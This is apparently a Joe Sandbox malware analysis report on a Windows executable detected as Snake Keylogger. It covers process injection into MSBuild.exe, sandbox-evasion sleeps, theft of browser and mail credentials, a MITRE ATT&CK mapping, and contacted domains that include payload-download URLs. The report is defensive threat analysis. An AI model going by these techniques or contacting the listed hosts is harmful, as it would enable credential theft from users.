Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -594438s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599561	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599016	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596624	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596395	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596266	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596141	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594438	Jump to behavior

Source: R86BRY7DdC.exe, 00000000.00000002.1699372606.000000001B790000.00000004.00000020.00020000.00000000.sdmp, R86BRY7DdC.exe, 00000000.00000002.1696581955.0000000000B02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: MSBuild.exe, 00000002.00000002.4116889523.00000000014A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\R86BRY7DdC.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\R86BRY7DdC.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\R86BRY7DdC.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\R86BRY7DdC.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 422000	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 424000	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1071008	Jump to behavior

Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"			Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"			Jump to behavior

Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Queries volume information: C:\Users\user\Desktop\R86BRY7DdC.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.R86BRY7DdC.exe.12a0f610.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.R86BRY7DdC.exe.12a0f610.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4118139508.000000000356B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4116615016.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1697512676.00000000128E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4118139508.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: R86BRY7DdC.exe PID: 7148, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6400, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.R86BRY7DdC.exe.12a0f610.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.R86BRY7DdC.exe.12a0f610.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4116615016.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1697512676.00000000128E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: R86BRY7DdC.exe PID: 7148, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6400, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.R86BRY7DdC.exe.12a0f610.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.R86BRY7DdC.exe.12a0f610.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4118139508.000000000356B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4116615016.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1697512676.00000000128E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4118139508.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: R86BRY7DdC.exe PID: 7148, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6400, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	311 Process Injection	1 Masquerading	1 OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	311 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Obfuscated Files or Information	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
R86BRY7DdC.exe	42%	ReversingLabs	Win32.Trojan.Generic
R86BRY7DdC.exe	32%	Virustotal		Browse

Source	Detection	Scanner	Link
reallyfreegeoip.org	0%	Virustotal	Browse
fp2e7a.wpc.phicdn.net	0%	Virustotal	Browse
checkip.dyndns.com	0%	Virustotal	Browse
checkip.dyndns.org	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://checkip.dyndns.org/	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33$	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
http://reallyfreegeoip.org	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
http://checkip.dyndns.com	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe
https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bdN	0%	Avira URL Cloud	safe
https://investdirectinsurance.com/NO	0%	Avira URL Cloud	safe
https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bdU	0%	Avira URL Cloud	safe
https://investdirectinsurance.com/assuence/litesolidCha/Ebagelog.bd	0%	Avira URL Cloud	safe
http://checkip.dyndns.comh	0%	Avira URL Cloud	safe
https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bd-	0%	Avira URL Cloud	safe
https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bd	0%	Avira URL Cloud	safe
https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bdK	0%	Avira URL Cloud	safe
https://investdirectinsurance.com/	0%	Avira URL Cloud	safe
https://investdirectinsurance.com/zOO	0%	Avira URL Cloud	safe
https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bdi/certs/Micr	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
reallyfreegeoip.org	188.114.96.3	true	true	0%, Virustotal, Browse	unknown
investdirectinsurance.com	172.67.189.102	true	false		unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	0%, Virustotal, Browse	unknown
checkip.dyndns.com	193.122.6.168	true	true	0%, Virustotal, Browse	unknown
checkip.dyndns.org	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	true	URL Reputation: safe	unknown
https://investdirectinsurance.com/assuence/litesolidCha/Ebagelog.bd	false	Avira URL Cloud: safe	unknown
https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bd	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://investdirectinsurance.com/NO	R86BRY7DdC.exe, 00000000.00000002.1696581955.0000000000B24000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bdU	R86BRY7DdC.exe, 00000000.00000002.1696581955.0000000000AC5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bdN	R86BRY7DdC.exe, 00000000.00000002.1696581955.0000000000AC5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33$	MSBuild.exe, 00000002.00000002.4118139508.0000000003519000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.000000000350C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.0000000003526000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.000000000356B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.00000000034BA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.comh	MSBuild.exe, 00000002.00000002.4118139508.0000000003526000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/q	R86BRY7DdC.exe, 00000000.00000002.1697512676.00000000128E9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4116615016.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bdK	R86BRY7DdC.exe, 00000000.00000002.1696581955.0000000000AF1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://reallyfreegeoip.org	MSBuild.exe, 00000002.00000002.4118139508.000000000348F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.0000000003519000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.000000000350C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.0000000003562000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.0000000003526000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.000000000356B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bd-	R86BRY7DdC.exe, 00000000.00000002.1696581955.0000000000AF1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org	MSBuild.exe, 00000002.00000002.4118139508.0000000003519000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.000000000350C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.0000000003526000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.000000000356B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.00000000034BA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.0000000003477000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://investdirectinsurance.com/zOO	R86BRY7DdC.exe, 00000000.00000002.1696581955.0000000000B24000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org	MSBuild.exe, 00000002.00000002.4118139508.0000000003519000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.000000000350C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.0000000003526000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.000000000346B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.000000000356B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.00000000034BA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.0000000003477000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.com	MSBuild.exe, 00000002.00000002.4118139508.0000000003519000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.000000000350C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.0000000003526000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.000000000356B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.0000000003477000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://investdirectinsurance.com/	R86BRY7DdC.exe, 00000000.00000002.1699372606.000000001B7C6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://investdirectinsurance.com/assuence/litesolidCha/Victim_SID.bdi/certs/Micr	R86BRY7DdC.exe, 00000000.00000002.1699372606.000000001B7C6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	MSBuild.exe, 00000002.00000002.4118139508.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/	R86BRY7DdC.exe, 00000000.00000002.1697512676.00000000128E9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4116615016.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.4118139508.0000000003477000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
193.122.6.168	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	true
188.114.96.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
172.67.189.102	investdirectinsurance.com	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1483419
Start date and time:	2024-07-27 11:38:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	R86BRY7DdC.exe renamed because original name is a hash value
Original Sample Name:	728aacf77f919b92f4bc04b4dec7898345dc57f0080fe09f16290ce424671767.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/3@3/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 100% Number of executed functions: 64 Number of non-executed functions: 7
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 40.68.123.157, 93.184.221.240, 192.229.221.95, 13.95.31.18
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
Execution Graph export aborted for target MSBuild.exe, PID 6400 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
05:39:07	API Interceptor	11919557x Sleep call for process: MSBuild.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
193.122.6.168	order072724.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	new order 00041221.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
